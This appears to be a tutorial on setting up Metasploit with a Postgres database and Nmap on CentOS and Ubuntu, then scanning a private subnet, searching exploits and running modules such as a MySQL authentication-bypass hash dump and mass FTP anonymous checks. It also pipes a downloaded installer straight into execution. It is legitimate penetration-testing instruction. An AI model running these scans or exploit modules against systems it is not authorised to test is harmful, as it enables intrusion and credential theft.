This article walks you through the process of installing, configuring and running scans using Metasploit and Nmap. Both CentOS 7 and Ubuntu 20.04 are discussed. Our objective is to be able to run nmap scans and have the results go into a database so we can filter the results later and then use Metasploit to exploit based on our options given the exposed services on hosts discovered in the scans. This article is based on details from several places including:
https://fedoraproject.org/wiki/Metasploit_Postgres_Setup https://docs.rapid7.com/metasploit/no-database-connection/ https://www.offensive-security.com/metasploit-unleashed/using-databases/
Setting everything up
Install Postgres and some other tools we generally use:
CentOS:
yum install postgresql postgresql-server nmap curl wget tcpdump
Ubuntu:
apt install postgresql postgresql-contrib nmap curl wget tcpdump
Install Metasploit:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall
Run the initial DB setup. This also creates some directories we need:
CentOS:
postgresql-setup initdb
Update your configuration file. For my system, only the lines indicated below were needed in the file. All other lines were removed. Take a backup of the file before removing anything:
CentOS: /var/lib/pgsql/data/pg_hba.conf Ubuntu: /etc/postgresql/12/main/pg_hba.conf
CentOS:
host msf_database msf_user 127.0.0.1/32 md5
Ubuntu:
local all postgres peer local all all peer host all all 127.0.0.1/32 md5 host msf_database msf_user 127.0.0.1/32 md5
The remainder of this article should be the same on both CentOS and Ubuntu.
Enable and start the DB:
systemctl enable postgresql systemctl restart postgresql
Create the DB and user:
su postgres createuser msf_user -P createdb --owner=msf_user msf_database Ignore directory permission errors. exit
Create the file “/opt/metasploit-framework/embedded/framework/config/database.yml” and add the following content. Change the password to whatever you set in the above steps:
development: adapter: "postgresql" database: "msf_database" username: "msf_user" password: "MYPASSWORD" port: 5432 host: "localhost" pool: 256 timeout: 5 production: adapter: "postgresql" database: "msf_database" username: "msf_user" password: "MYPASSWORD" port: 5432 host: "localhost" pool: 256 timeout: 5
Run Metasploit and see if you can connect to the database. Metasploit is usually executable from “/opt/metasploit-framework/bin”:
msfconsole db_connect msf_user:[email protected]:5432/msf_database db_status
Creating a workspace to keep things separate
If you’re a pen-tester with multiple clients, or you want to keep multiple scans separate, use the “workspace” feature. It’s basically a name-space, a way of keeping results logically separate.
Create a Workspace (see details here “https://docs.rapid7.com/metasploit/managing-workspaces/”) and switch to it:
# workspace -a TestWork # workspace TestWork
Scan a subnet and add it to our database
And conduct a scan of your target subnet:
# db_nmap -sV 192.168.1.0/24 192.168.1.143 443 tcp ssl/https open VMware ESXi SOAP API 6.5.0 192.168.1.193 443 tcp ssl/http open Microsoft IIS httpd 10.0 192.168.1.179 443 tcp ssl/http open Apache httpd Express
TIP: The -sV tells nmap to get more details about the services listening on ports. Ie, version numbers.
The above scan is saved to the DB. Now we can sort through the results using basic queries. For example, get all hosts with port 443 or 3306 open:
# services -p 443,3306 -u host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.1.175 443 tcp ssl/http open Apache httpd 2.4 192.168.1.176 443 tcp ssl/http open Apache httpd 2.4 192.168.1.177 443 tcp ssl/http open Apache httpd Express 192.168.1.178 443 tcp ssl/http open Apache httpd Express 192.168.1.179 443 tcp ssl/http open Apache httpd Express 192.168.1.143 3306 tcp mysql open MySQL 5.5.5-10.3.28-MariaDB
TIP: The -p allows you to list comma separated port numbers. The -u shows only hosts that list the given port/s as open.
Now we can search for exploits that match our targets. In this example, we’ll focus on exploits relating to “mysql” with a rank of “excellent”:
# search rank:excellent mysql
Actually conducting an exploit attempt:
msf6 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > options Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS file:/tmp/msf-db-rhosts-20210824-1501072-r8icdz yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 3306 yes The target port (TCP) THREADS 1 yes The number of concurrent threads (max one per host) USERNAME root yes The username to authenticate as msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set rhost 192.168.1.143 rhost => 192.168.1.143 msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run [+] 192.168.1.143:3306 - 192.168.1.143:3306 The server allows logins, proceeding with bypass test [*] 192.168.1.143:3306 - 192.168.1.143:3306 Authentication bypass is 10% complete [*] 192.168.1.143:3306 - 192.168.1.143:3306 Authentication bypass is 20% complete [*] 192.168.1.143:3306 - 192.168.1.143:3306 Authentication bypass is 30% complete ... [*] 192.168.1.143:3306 - 192.168.1.143:3306 Authentication bypass is 90% complete [*] 192.168.1.143:3306 - 192.168.1.143:3306 Authentication bypass is 100% complete [-] 192.168.1.143:3306 - 192.168.1.143:3306 Unable to bypass authentication, this target may not be vulnerable [*] 192.168.1.143:3306 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
I suppose it’s good that the test server was not successfully exploited.
Exploit all matching machines
Suppose we want to discover all target computers with FTP exposed and the anonymous feature enabled. We would filter our previous db_nmap results – but this time add the “-R” option with the “services” command. Here’s a full example:
use scanner/ftp/anonymous services -p 21 -R run
The above does so much for us. It gathers all computers from a previous db_nmap scan that lists port 21 as open (FTP), and then adds those computers/targets to the “RHOSTS” variable.
Continuous scanning
You can run your scans in the background on a schedule using the following example command. Put this into a script of cronjob for scheduling:
# nohup msfconsole -x "db_connect msf_user:[email protected]:5432/msf_database" -x "db_nmap -A 192.168.1.0/24" &
Check on the progress by running:
tail -f nohup.out
Troubleshooting
If you have trouble, it’s likely to do with the database. You can see if Metasploit is the issue or the DB config by trying to connect to it using the psgl cli command:
psql -h 127.0.0.1 -U msf_user --password -d msf_database
If you get the error “Couldn’t open a raw socket. Error: Permission denied (13)” when using nmap in WSL, try this command from the shell as root. Make sure NMap actually exists in this location or change it accordingly:
alias nmap='"/mnt/c/Program Files (x86)/Nmap/nmap.exe"'
If you’re using Windows Subsystem for Linux (WSL), consider upgrading to version 2:
https://www.configserverfirewall.com/windows-10/convert-wsl-1-linux-distribution-to-wsl-2/